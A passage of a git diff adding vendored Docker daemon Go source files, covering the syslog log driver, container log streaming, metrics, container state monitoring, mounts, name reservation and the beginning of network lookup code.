+	"lpr":      syslog.LOG_LPR,
+	"news":     syslog.LOG_NEWS,
+	"uucp":     syslog.LOG_UUCP,
+	"cron":     syslog.LOG_CRON,
+	"authpriv": syslog.LOG_AUTHPRIV,
+	"ftp":      syslog.LOG_FTP,
+	"local0":   syslog.LOG_LOCAL0,
+	"local1":   syslog.LOG_LOCAL1,
+	"local2":   syslog.LOG_LOCAL2,
+	"local3":   syslog.LOG_LOCAL3,
+	"local4":   syslog.LOG_LOCAL4,
+	"local5":   syslog.LOG_LOCAL5,
+	"local6":   syslog.LOG_LOCAL6,
+	"local7":   syslog.LOG_LOCAL7,
+}
+
+type syslogger struct {
+	writer *syslog.Writer
+}
+
+func init() {
+	if err := logger.RegisterLogDriver(name, New); err != nil {
+		logrus.Fatal(err)
+	}
+	if err := logger.RegisterLogOptValidator(name, ValidateLogOpt); err != nil {
+		logrus.Fatal(err)
+	}
+}
+
+// rsyslog uses appname part of syslog message to fill in an %syslogtag% template
+// attribute in rsyslog.conf. In order to be backward compatible to rfc3164
+// tag will be also used as an appname
+func rfc5424formatterWithAppNameAsTag(p syslog.Priority, hostname, tag, content string) string {
+	timestamp := time.Now().Format(time.RFC3339)
+	pid := os.Getpid()
+	msg := fmt.Sprintf("<%d>%d %s %s %s %d %s %s",
+		p, 1, timestamp, hostname, tag, pid, tag, content)
+	return msg
+}
+
+// The timestamp field in rfc5424 is derived from rfc3339. Whereas rfc3339 makes allowances
+// for multiple syntaxes, there are further restrictions in rfc5424, i.e., the maximium
+// resolution is limited to "TIME-SECFRAC" which is 6 (microsecond resolution)
+func rfc5424microformatterWithAppNameAsTag(p syslog.Priority, hostname, tag, content string) string {
+	timestamp := time.Now().Format("2006-01-02T15:04:05.999999Z07:00")
+	pid := os.Getpid()
+	msg := fmt.Sprintf("<%d>%d %s %s %s %d %s %s",
+		p, 1, timestamp, hostname, tag, pid, tag, content)
+	return msg
+}
+
+// New creates a syslog logger using the configuration passed in on
+// the context. Supported context configuration variables are
+// syslog-address, syslog-facility, syslog-format.
+func New(ctx logger.Context) (logger.Logger, error) {
+	tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate)
+	if err != nil {
+		return nil, err
+	}
+
+	proto, address, err := parseAddress(ctx.Config["syslog-address"])
+	if err != nil {
+		return nil, err
+	}
+
+	facility, err := parseFacility(ctx.Config["syslog-facility"])
+	if err != nil {
+		return nil, err
+	}
+
+	syslogFormatter, syslogFramer, err := parseLogFormat(ctx.Config["syslog-format"], proto)
+	if err != nil {
+		return nil, err
+	}
+
+	var log *syslog.Writer
+	if proto == secureProto {
+		tlsConfig, tlsErr := parseTLSConfig(ctx.Config)
+		if tlsErr != nil {
+			return nil, tlsErr
+		}
+		log, err = syslog.DialWithTLSConfig(proto, address, facility, tag, tlsConfig)
+	} else {
+		log, err = syslog.Dial(proto, address, facility, tag)
+	}
+
+	if err != nil {
+		return nil, err
+	}
+
+	log.SetFormatter(syslogFormatter)
+	log.SetFramer(syslogFramer)
+
+	return &syslogger{
+		writer: log,
+	}, nil
+}
+
+func (s *syslogger) Log(msg *logger.Message) error {
+	if msg.Source == "stderr" {
+		return s.writer.Err(string(msg.Line))
+	}
+	return s.writer.Info(string(msg.Line))
+}
+
+func (s *syslogger) Close() error {
+	return s.writer.Close()
+}
+
+func (s *syslogger) Name() string {
+	return name
+}
+
+func parseAddress(address string) (string, string, error) {
+	if address == "" {
+		return "", "", nil
+	}
+	if !urlutil.IsTransportURL(address) {
+		return "", "", fmt.Errorf("syslog-address should be in form proto://address, got %v", address)
+	}
+	url, err := url.Parse(address)
+	if err != nil {
+		return "", "", err
+	}
+
+	// unix and unixgram socket validation
+	if url.Scheme == "unix" || url.Scheme == "unixgram" {
+		if _, err := os.Stat(url.Path); err != nil {
+			return "", "", err
+		}
+		return url.Scheme, url.Path, nil
+	}
+
+	// here we process tcp|udp
+	host := url.Host
+	if _, _, err := net.SplitHostPort(host); err != nil {
+		if !strings.Contains(err.Error(), "missing port in address") {
+			return "", "", err
+		}
+		host = host + ":514"
+	}
+
+	return url.Scheme, host, nil
+}
+
+// ValidateLogOpt looks for syslog specific log options
+// syslog-address, syslog-facility.
+func ValidateLogOpt(cfg map[string]string) error {
+	for key := range cfg {
+		switch key {
+		case "env":
+		case "labels":
+		case "syslog-address":
+		case "syslog-facility":
+		case "syslog-tls-ca-cert":
+		case "syslog-tls-cert":
+		case "syslog-tls-key":
+		case "syslog-tls-skip-verify":
+		case "tag":
+		case "syslog-format":
+		default:
+			return fmt.Errorf("unknown log opt '%s' for syslog log driver", key)
+		}
+	}
+	if _, _, err := parseAddress(cfg["syslog-address"]); err != nil {
+		return err
+	}
+	if _, err := parseFacility(cfg["syslog-facility"]); err != nil {
+		return err
+	}
+	if _, _, err := parseLogFormat(cfg["syslog-format"], ""); err != nil {
+		return err
+	}
+	return nil
+}
+
+func parseFacility(facility string) (syslog.Priority, error) {
+	if facility == "" {
+		return syslog.LOG_DAEMON, nil
+	}
+
+	if syslogFacility, valid := facilities[facility]; valid {
+		return syslogFacility, nil
+	}
+
+	fInt, err := strconv.Atoi(facility)
+	if err == nil && 0 <= fInt && fInt <= 23 {
+		return syslog.Priority(fInt << 3), nil
+	}
+
+	return syslog.Priority(0), errors.New("invalid syslog facility")
+}
+
+func parseTLSConfig(cfg map[string]string) (*tls.Config, error) {
+	_, skipVerify := cfg["syslog-tls-skip-verify"]
+
+	opts := tlsconfig.Options{
+		CAFile:             cfg["syslog-tls-ca-cert"],
+		CertFile:           cfg["syslog-tls-cert"],
+		KeyFile:            cfg["syslog-tls-key"],
+		InsecureSkipVerify: skipVerify,
+	}
+
+	return tlsconfig.Client(opts)
+}
+
+func parseLogFormat(logFormat, proto string) (syslog.Formatter, syslog.Framer, error) {
+	switch logFormat {
+	case "":
+		return syslog.UnixFormatter, syslog.DefaultFramer, nil
+	case "rfc3164":
+		return syslog.RFC3164Formatter, syslog.DefaultFramer, nil
+	case "rfc5424":
+		if proto == secureProto {
+			return rfc5424formatterWithAppNameAsTag, syslog.RFC5425MessageLengthFramer, nil
+		}
+		return rfc5424formatterWithAppNameAsTag, syslog.DefaultFramer, nil
+	case "rfc5424micro":
+		if proto == secureProto {
+			return rfc5424microformatterWithAppNameAsTag, syslog.RFC5425MessageLengthFramer, nil
+		}
+		return rfc5424microformatterWithAppNameAsTag, syslog.DefaultFramer, nil
+	default:
+		return nil, nil, errors.New("Invalid syslog format")
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go
new file mode 100644
index 0000000000..501561064b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go
@@ -0,0 +1,62 @@
+package syslog
+
+import (
+	"reflect"
+	"testing"
+
+	syslog "github.com/RackSec/srslog"
+)
+
+func functionMatches(expectedFun interface{}, actualFun interface{}) bool {
+	return reflect.ValueOf(expectedFun).Pointer() == reflect.ValueOf(actualFun).Pointer()
+}
+
+func TestParseLogFormat(t *testing.T) {
+	formatter, framer, err := parseLogFormat("rfc5424", "udp")
+	if err != nil || !functionMatches(rfc5424formatterWithAppNameAsTag, formatter) ||
+		!functionMatches(syslog.DefaultFramer, framer) {
+		t.Fatal("Failed to parse rfc5424 format", err, formatter, framer)
+	}
+
+	formatter, framer, err = parseLogFormat("rfc5424", "tcp+tls")
+	if err != nil || !functionMatches(rfc5424formatterWithAppNameAsTag, formatter) ||
+		!functionMatches(syslog.RFC5425MessageLengthFramer, framer) {
+		t.Fatal("Failed to parse rfc5424 format", err, formatter, framer)
+	}
+
+	formatter, framer, err = parseLogFormat("rfc5424micro", "udp")
+	if err != nil || !functionMatches(rfc5424microformatterWithAppNameAsTag, formatter) ||
+		!functionMatches(syslog.DefaultFramer, framer) {
+		t.Fatal("Failed to parse rfc5424 (microsecond) format", err, formatter, framer)
+	}
+
+	formatter, framer, err = parseLogFormat("rfc5424micro", "tcp+tls")
+	if err != nil || !functionMatches(rfc5424microformatterWithAppNameAsTag, formatter) ||
+		!functionMatches(syslog.RFC5425MessageLengthFramer, framer) {
+		t.Fatal("Failed to parse rfc5424 (microsecond) format", err, formatter, framer)
+	}
+
+	formatter, framer, err = parseLogFormat("rfc3164", "")
+	if err != nil || !functionMatches(syslog.RFC3164Formatter, formatter) ||
+		!functionMatches(syslog.DefaultFramer, framer) {
+		t.Fatal("Failed to parse rfc3164 format", err, formatter, framer)
+	}
+
+	formatter, framer, err = parseLogFormat("", "")
+	if err != nil || !functionMatches(syslog.UnixFormatter, formatter) ||
+		!functionMatches(syslog.DefaultFramer, framer) {
+		t.Fatal("Failed to parse empty format", err, formatter, framer)
+	}
+
+	formatter, framer, err = parseLogFormat("invalid", "")
+	if err == nil {
+		t.Fatal("Failed to parse invalid format", err, formatter, framer)
+	}
+}
+
+func TestValidateLogOptEmpty(t *testing.T) {
+	emptyConfig := make(map[string]string)
+	if err := ValidateLogOpt(emptyConfig); err != nil {
+		t.Fatal("Failed to parse empty config", err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/logs.go b/vendor/github.com/docker/docker/daemon/logs.go
new file mode 100644
index 0000000000..cc34b82083
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logs.go
@@ -0,0 +1,142 @@
+package daemon
+
+import (
+	"fmt"
+	"io"
+	"strconv"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types/backend"
+	containertypes "github.com/docker/docker/api/types/container"
+	timetypes "github.com/docker/docker/api/types/time"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/stdcopy"
+)
+
+// ContainerLogs hooks up a container's stdout and stderr streams
+// configured with the given struct.
+func (daemon *Daemon) ContainerLogs(ctx context.Context, containerName string, config *backend.ContainerLogsConfig, started chan struct{}) error {
+	container, err := daemon.GetContainer(containerName)
+	if err != nil {
+		return err
+	}
+
+	if !(config.ShowStdout || config.ShowStderr) {
+		return fmt.Errorf("You must choose at least one stream")
+	}
+
+	cLog, err := daemon.getLogger(container)
+	if err != nil {
+		return err
+	}
+	logReader, ok := cLog.(logger.LogReader)
+	if !ok {
+		return logger.ErrReadLogsNotSupported
+	}
+
+	follow := config.Follow && container.IsRunning()
+	tailLines, err := strconv.Atoi(config.Tail)
+	if err != nil {
+		tailLines = -1
+	}
+
+	logrus.Debug("logs: begin stream")
+
+	var since time.Time
+	if config.Since != "" {
+		s, n, err := timetypes.ParseTimestamps(config.Since, 0)
+		if err != nil {
+			return err
+		}
+		since = time.Unix(s, n)
+	}
+	readConfig := logger.ReadConfig{
+		Since:  since,
+		Tail:   tailLines,
+		Follow: follow,
+	}
+	logs := logReader.ReadLogs(readConfig)
+
+	wf := ioutils.NewWriteFlusher(config.OutStream)
+	defer wf.Close()
+	close(started)
+	wf.Flush()
+
+	var outStream io.Writer
+	outStream = wf
+	errStream := outStream
+	if !container.Config.Tty {
+		errStream = stdcopy.NewStdWriter(outStream, stdcopy.Stderr)
+		outStream = stdcopy.NewStdWriter(outStream, stdcopy.Stdout)
+	}
+
+	for {
+		select {
+		case err := <-logs.Err:
+			logrus.Errorf("Error streaming logs: %v", err)
+			return nil
+		case <-ctx.Done():
+			logs.Close()
+			return nil
+		case msg, ok := <-logs.Msg:
+			if !ok {
+				logrus.Debug("logs: end stream")
+				logs.Close()
+				if cLog != container.LogDriver {
+					// Since the logger isn't cached in the container, which occurs if it is running, it
+					// must get explicitly closed here to avoid leaking it and any file handles it has.
+					if err := cLog.Close(); err != nil {
+						logrus.Errorf("Error closing logger: %v", err)
+					}
+				}
+				return nil
+			}
+			logLine := msg.Line
+			if config.Details {
+				logLine = append([]byte(msg.Attrs.String()+" "), logLine...)
+			}
+			if config.Timestamps {
+				logLine = append([]byte(msg.Timestamp.Format(logger.TimeFormat)+" "), logLine...)
+			}
+			if msg.Source == "stdout" && config.ShowStdout {
+				outStream.Write(logLine)
+			}
+			if msg.Source == "stderr" && config.ShowStderr {
+				errStream.Write(logLine)
+			}
+		}
+	}
+}
+
+func (daemon *Daemon) getLogger(container *container.Container) (logger.Logger, error) {
+	if container.LogDriver != nil && container.IsRunning() {
+		return container.LogDriver, nil
+	}
+	return container.StartLogger(container.HostConfig.LogConfig)
+}
+
+// mergeLogConfig merges the daemon log config to the container's log config if the container's log driver is not specified.
+func (daemon *Daemon) mergeAndVerifyLogConfig(cfg *containertypes.LogConfig) error {
+	if cfg.Type == "" {
+		cfg.Type = daemon.defaultLogConfig.Type
+	}
+
+	if cfg.Config == nil {
+		cfg.Config = make(map[string]string)
+	}
+
+	if cfg.Type == daemon.defaultLogConfig.Type {
+		for k, v := range daemon.defaultLogConfig.Config {
+			if _, ok := cfg.Config[k]; !ok {
+				cfg.Config[k] = v
+			}
+		}
+	}
+
+	return logger.ValidateLogOpts(cfg.Type, cfg.Config)
+}
diff --git a/vendor/github.com/docker/docker/daemon/logs_test.go b/vendor/github.com/docker/docker/daemon/logs_test.go
new file mode 100644
index 0000000000..0c36299e09
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logs_test.go
@@ -0,0 +1,15 @@
+package daemon
+
+import (
+	"testing"
+
+	containertypes "github.com/docker/docker/api/types/container"
+)
+
+func TestMergeAndVerifyLogConfigNilConfig(t *testing.T) {
+	d := &Daemon{defaultLogConfig: containertypes.LogConfig{Type: "json-file", Config: map[string]string{"max-file": "1"}}}
+	cfg := containertypes.LogConfig{Type: d.defaultLogConfig.Type}
+	if err := d.mergeAndVerifyLogConfig(&cfg); err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/metrics.go b/vendor/github.com/docker/docker/daemon/metrics.go
new file mode 100644
index 0000000000..69dbfd9378
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/metrics.go
@@ -0,0 +1,42 @@
+package daemon
+
+import "github.com/docker/go-metrics"
+
+var (
+	containerActions          metrics.LabeledTimer
+	imageActions              metrics.LabeledTimer
+	networkActions            metrics.LabeledTimer
+	engineVersion             metrics.LabeledGauge
+	engineCpus                metrics.Gauge
+	engineMemory              metrics.Gauge
+	healthChecksCounter       metrics.Counter
+	healthChecksFailedCounter metrics.Counter
+)
+
+func init() {
+	ns := metrics.NewNamespace("engine", "daemon", nil)
+	containerActions = ns.NewLabeledTimer("container_actions", "The number of seconds it takes to process each container action", "action")
+	for _, a := range []string{
+		"start",
+		"changes",
+		"commit",
+		"create",
+		"delete",
+	} {
+		containerActions.WithValues(a).Update(0)
+	}
+	networkActions = ns.NewLabeledTimer("network_actions", "The number of seconds it takes to process each network action", "action")
+	engineVersion = ns.NewLabeledGauge("engine", "The version and commit information for the engine process", metrics.Unit("info"),
+		"version",
+		"commit",
+		"architecture",
+		"graph_driver", "kernel",
+		"os",
+	)
+	engineCpus = ns.NewGauge("engine_cpus", "The number of cpus that the host system of the engine has", metrics.Unit("cpus"))
+	engineMemory = ns.NewGauge("engine_memory", "The number of bytes of memory that the host system of the engine has", metrics.Bytes)
+	healthChecksCounter = ns.NewCounter("health_checks", "The total number of health checks")
+	healthChecksFailedCounter = ns.NewCounter("health_checks_failed", "The total number of failed health checks")
+	imageActions = ns.NewLabeledTimer("image_actions", "The number of seconds it takes to process each image action", "action")
+	metrics.Register(ns)
+}
diff --git a/vendor/github.com/docker/docker/daemon/monitor.go b/vendor/github.com/docker/docker/daemon/monitor.go
new file mode 100644
index 0000000000..ee0d1fcce0
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/monitor.go
@@ -0,0 +1,132 @@
+package daemon
+
+import (
+	"errors"
+	"fmt"
+	"runtime"
+	"strconv"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/libcontainerd"
+	"github.com/docker/docker/restartmanager"
+)
+
+// StateChanged updates daemon state changes from containerd
+func (daemon *Daemon) StateChanged(id string, e libcontainerd.StateInfo) error {
+	c := daemon.containers.Get(id)
+	if c == nil {
+		return fmt.Errorf("no such container: %s", id)
+	}
+
+	switch e.State {
+	case libcontainerd.StateOOM:
+		// StateOOM is Linux specific and should never be hit on Windows
+		if runtime.GOOS == "windows" {
+			return errors.New("Received StateOOM from libcontainerd on Windows. This should never happen.")
+		}
+		daemon.updateHealthMonitor(c)
+		daemon.LogContainerEvent(c, "oom")
+	case libcontainerd.StateExit:
+		// if container's AutoRemove flag is set, remove it after clean up
+		autoRemove := func() {
+			if c.HostConfig.AutoRemove {
+				if err := daemon.ContainerRm(c.ID, &types.ContainerRmConfig{ForceRemove: true, RemoveVolume: true}); err != nil {
+					logrus.Errorf("can't remove container %s: %v", c.ID, err)
+				}
+			}
+		}
+
+		c.Lock()
+		c.StreamConfig.Wait()
+		c.Reset(false)
+
+		restart, wait, err := c.RestartManager().ShouldRestart(e.ExitCode, false, time.Since(c.StartedAt))
+		if err == nil && restart {
+			c.RestartCount++
+			c.SetRestarting(platformConstructExitStatus(e))
+		} else {
+			c.SetStopped(platformConstructExitStatus(e))
+			defer autoRemove()
+		}
+
+		daemon.updateHealthMonitor(c)
+		attributes := map[string]string{
+			"exitCode": strconv.Itoa(int(e.ExitCode)),
+		}
+		daemon.LogContainerEventWithAttributes(c, "die", attributes)
+		daemon.Cleanup(c)
+
+		if err == nil && restart {
+			go func() {
+				err := <-wait
+				if err == nil {
+					if err = daemon.containerStart(c, "", "", false); err != nil {
+						logrus.Debugf("failed to restart container: %+v", err)
+					}
+				}
+				if err != nil {
+					c.SetStopped(platformConstructExitStatus(e))
+					defer autoRemove()
+					if err != restartmanager.ErrRestartCanceled {
+						logrus.Errorf("restartmanger wait error: %+v", err)
+					}
+				}
+			}()
+		}
+
+		defer c.Unlock()
+		if err := c.ToDisk(); err != nil {
+			return err
+		}
+		return daemon.postRunProcessing(c, e)
+	case libcontainerd.StateExitProcess:
+		if execConfig := c.ExecCommands.Get(e.ProcessID); execConfig != nil {
+			ec := int(e.ExitCode)
+			execConfig.Lock()
+			defer execConfig.Unlock()
+			execConfig.ExitCode = &ec
+			execConfig.Running = false
+			execConfig.StreamConfig.Wait()
+			if err := execConfig.CloseStreams(); err != nil {
+				logrus.Errorf("%s: %s", c.ID, err)
+			}
+
+			// remove the exec command from the container's store only and not the
+			// daemon's store so that the exec command can be inspected.
+			c.ExecCommands.Delete(execConfig.ID)
+		} else {
+			logrus.Warnf("Ignoring StateExitProcess for %v but no exec command found", e)
+		}
+	case libcontainerd.StateStart, libcontainerd.StateRestore:
+		// Container is already locked in this case
+		c.SetRunning(int(e.Pid), e.State == libcontainerd.StateStart)
+		c.HasBeenManuallyStopped = false
+		c.HasBeenStartedBefore = true
+		if err := c.ToDisk(); err != nil {
+			c.Reset(false)
+			return err
+		}
+		daemon.initHealthMonitor(c)
+		daemon.LogContainerEvent(c, "start")
+	case libcontainerd.StatePause:
+		// Container is already locked in this case
+		c.Paused = true
+		if err := c.ToDisk(); err != nil {
+			return err
+		}
+		daemon.updateHealthMonitor(c)
+		daemon.LogContainerEvent(c, "pause")
+	case libcontainerd.StateResume:
+		// Container is already locked in this case
+		c.Paused = false
+		if err := c.ToDisk(); err != nil {
+			return err
+		}
+		daemon.updateHealthMonitor(c)
+		daemon.LogContainerEvent(c, "unpause")
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/monitor_linux.go b/vendor/github.com/docker/docker/daemon/monitor_linux.go
new file mode 100644
index 0000000000..09f5af50c6
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/monitor_linux.go
@@ -0,0 +1,19 @@
+package daemon
+
+import (
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/libcontainerd"
+)
+
+// platformConstructExitStatus returns a platform specific exit status structure
+func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus {
+	return &container.ExitStatus{
+		ExitCode:  int(e.ExitCode),
+		OOMKilled: e.OOMKilled,
+	}
+}
+
+// postRunProcessing perfoms any processing needed on the container after it has stopped.
+func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/monitor_solaris.go b/vendor/github.com/docker/docker/daemon/monitor_solaris.go
new file mode 100644
index 0000000000..5ccfada76a
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/monitor_solaris.go
@@ -0,0 +1,18 @@
+package daemon
+
+import (
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/libcontainerd"
+)
+
+// platformConstructExitStatus returns a platform specific exit status structure
+func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus {
+	return &container.ExitStatus{
+		ExitCode: int(e.ExitCode),
+	}
+}
+
+// postRunProcessing perfoms any processing needed on the container after it has stopped.
+func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/monitor_windows.go b/vendor/github.com/docker/docker/daemon/monitor_windows.go
new file mode 100644
index 0000000000..9648b1b415
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/monitor_windows.go
@@ -0,0 +1,46 @@
+package daemon
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/libcontainerd"
+)
+
+// platformConstructExitStatus returns a platform specific exit status structure
+func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus {
+	return &container.ExitStatus{
+		ExitCode: int(e.ExitCode),
+	}
+}
+
+// postRunProcessing perfoms any processing needed on the container after it has stopped.
+func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error {
+	if e.ExitCode == 0 && e.UpdatePending {
+		spec, err := daemon.createSpec(container)
+		if err != nil {
+			return err
+		}
+
+		newOpts := []libcontainerd.CreateOption{&libcontainerd.ServicingOption{
+			IsServicing: true,
+		}}
+
+		copts, err := daemon.getLibcontainerdCreateOptions(container)
+		if err != nil {
+			return err
+		}
+
+		if copts != nil {
+			newOpts = append(newOpts, copts...)
+		}
+
+		// Create a new servicing container, which will start, complete the update, and merge back the
+		// results if it succeeded, all as part of the below function call.
+		if err := daemon.containerd.Create((container.ID + "_servicing"), "", "", *spec, container.InitializeStdio, newOpts...); err != nil {
+			container.SetExitCode(-1)
+			return fmt.Errorf("Post-run update servicing failed: %s", err)
+		}
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/mounts.go b/vendor/github.com/docker/docker/daemon/mounts.go
new file mode 100644
index 0000000000..1c11f86a80
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/mounts.go
@@ -0,0 +1,48 @@
+package daemon
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/container"
+	volumestore "github.com/docker/docker/volume/store"
+)
+
+func (daemon *Daemon) prepareMountPoints(container *container.Container) error {
+	for _, config := range container.MountPoints {
+		if err := daemon.lazyInitializeVolume(container.ID, config); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+func (daemon *Daemon) removeMountPoints(container *container.Container, rm bool) error {
+	var rmErrors []string
+	for _, m := range container.MountPoints {
+		if m.Volume == nil {
+			continue
+		}
+		daemon.volumes.Dereference(m.Volume, container.ID)
+		if rm {
+			// Do not remove named mountpoints
+			// these are mountpoints specified like `docker run -v <name>:/foo`
+			if m.Spec.Source != "" {
+				continue
+			}
+			err := daemon.volumes.Remove(m.Volume)
+			// Ignore volume in use errors because having this
+			// volume being referenced by other container is
+			// not an error, but an implementation detail.
+			// This prevents docker from logging "ERROR: Volume in use"
+			// where there is another container using the volume.
+			if err != nil && !volumestore.IsInUse(err) {
+				rmErrors = append(rmErrors, err.Error())
+			}
+		}
+	}
+	if len(rmErrors) > 0 {
+		return fmt.Errorf("Error removing volumes:\n%v", strings.Join(rmErrors, "\n"))
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/names.go b/vendor/github.com/docker/docker/daemon/names.go
new file mode 100644
index 0000000000..273d551513
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/names.go
@@ -0,0 +1,116 @@
+package daemon
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/pkg/namesgenerator"
+	"github.com/docker/docker/pkg/registrar"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/utils"
+)
+
+var (
+	validContainerNameChars   = utils.RestrictedNameChars
+	validContainerNamePattern = utils.RestrictedNamePattern
+)
+
+func (daemon *Daemon) registerName(container *container.Container) error {
+	if daemon.Exists(container.ID) {
+		return fmt.Errorf("Container is already loaded")
+	}
+	if err := validateID(container.ID); err != nil {
+		return err
+	}
+	if container.Name == "" {
+		name, err := daemon.generateNewName(container.ID)
+		if err != nil {
+			return err
+		}
+		container.Name = name
+
+		if err := container.ToDiskLocking(); err != nil {
+			logrus.Errorf("Error saving container name to disk: %v", err)
+		}
+	}
+	return daemon.nameIndex.Reserve(container.Name, container.ID)
+}
+
+func (daemon *Daemon) generateIDAndName(name string) (string, string, error) {
+	var (
+		err error
+		id  = stringid.GenerateNonCryptoID()
+	)
+
+	if name == "" {
+		if name, err = daemon.generateNewName(id); err != nil {
+			return "", "", err
+		}
+		return id, name, nil
+	}
+
+	if name, err = daemon.reserveName(id, name); err != nil {
+		return "", "", err
+	}
+
+	return id, name, nil
+}
+
+func (daemon *Daemon) reserveName(id, name string) (string, error) {
+	if !validContainerNamePattern.MatchString(strings.TrimPrefix(name, "/")) {
+		return "", fmt.Errorf("Invalid container name (%s), only %s are allowed", name, validContainerNameChars)
+	}
+	if name[0] != '/' {
+		name = "/" + name
+	}
+
+	if err := daemon.nameIndex.Reserve(name, id); err != nil {
+		if err == registrar.ErrNameReserved {
+			id, err := daemon.nameIndex.Get(name)
+			if err != nil {
+				logrus.Errorf("got unexpected error while looking up reserved name: %v", err)
+				return "", err
+			}
+			return "", fmt.Errorf("Conflict. The container name %q is already in use by container %s. You have to remove (or rename) that container to be able to reuse that name.", name, id)
+		}
+		return "", fmt.Errorf("error reserving name: %s, error: %v", name, err)
+	}
+	return name, nil
+}
+
+func (daemon *Daemon) releaseName(name string) {
+	daemon.nameIndex.Release(name)
+}
+
+func (daemon *Daemon) generateNewName(id string) (string, error) {
+	var name string
+	for i := 0; i < 6; i++ {
+		name = namesgenerator.GetRandomName(i)
+		if name[0] != '/' {
+			name = "/" + name
+		}
+
+		if err := daemon.nameIndex.Reserve(name, id); err != nil {
+			if err == registrar.ErrNameReserved {
+				continue
+			}
+			return "", err
+		}
+		return name, nil
+	}
+
+	name = "/" + stringid.TruncateID(id)
+	if err := daemon.nameIndex.Reserve(name, id); err != nil {
+		return "", err
+	}
+	return name, nil
+}
+
+func validateID(id string) error {
+	if id == "" {
+		return fmt.Errorf("Invalid empty id")
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/network.go b/vendor/github.com/docker/docker/daemon/network.go
new file mode 100644
index 0000000000..ab8fd88da8
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/network.go
@@ -0,0 +1,498 @@
+package daemon
+
+import (
+	"fmt"
+	"net"
+	"runtime"
+	"sort"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	apierrors "github.com/docker/docker/api/errors"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/network"
+	clustertypes "github.com/docker/docker/daemon/cluster/provider"
+	"github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/docker/runconfig"
+	"github.com/docker/libnetwork"
+	"github.com/docker/libnetwork/driverapi"
+	"github.com/docker/libnetwork/ipamapi"
+	networktypes "github.com/docker/libnetwork/types"
+	"github.com/pkg/errors"
+	"golang.org/x/net/context"
+)
+
+// NetworkControllerEnabled checks if the networking stack is enabled.
+// This feature depends on OS primitives and it's disabled in systems like Windows.
+func (daemon *Daemon) NetworkControllerEnabled() bool {
+	return daemon.netController != nil
+}
+
+// FindNetwork function finds a network for a given string that can represent network name or id
+func (daemon *Daemon) FindNetwork(idName string) (libnetwork.Network, error) {
+	// Find by Name
+	n, err := daemon.GetNetworkByName(idName)
+	if err != nil && !isNoSuchNetworkError(err) {
+		return nil, err
+	}
+
+	if n != nil {
+		return n, nil
+	}
+
+	// Find by id
+	return daemon.GetNetworkByID(idName)
+}
+
+func isNoSuchNetworkError(err error) bool {
+	_, ok := err.(libnetwork.ErrNoSuchNetwork)
+	return ok
+}
+
+// GetNetworkByID function returns a network whose ID begins with the given prefix.
+// It fails with an error if no matching, or more than one matching, networks are found.
+func (daemon *Daemon) GetNetworkByID(partialID string) (libnetwork.Network, error) {
+	list := daemon.GetNetworksByID(partialID)
+
+	if len(list) == 0 {
+		return nil, libnetwork.ErrNoSuchNetwork(partialID)
+	}
+	if len(list) > 1 {
+		return nil, libnetwork.ErrInvalidID(partialID)
+	}
+	return list[0], nil
+}
+
+// GetNetworkByName function returns a network for a given network name.
+// If no network name is given, the default network is returned.
+func (daemon *Daemon) GetNetworkByName(name string) (libnetwork.Network, error) {
+	c := daemon.netController
+	if c == nil {
+		return nil, libnetwork.ErrNoSuchNetwork(name)
+	}
+	if name == "" {
+		name = c.Config().Daemon.DefaultNetwork
+	}
+	return c.NetworkByName(name)
+}
+
+// GetNetworksByID returns a list of networks whose ID partially matches zero or more networks
+func (daemon *Daemon) GetNetworksByID(partialID string) []libnetwork.Network {
+	c := daemon.netController
+	if c == nil {
+		return nil
+	}
+	list := []libnetwork.Network{}
+	l := func(nw libnetwork.Network) bool {
+		if strings.HasPrefix(nw.ID(), partialID) {
+			list = append(list, nw)
+		}
+		return false
+	}
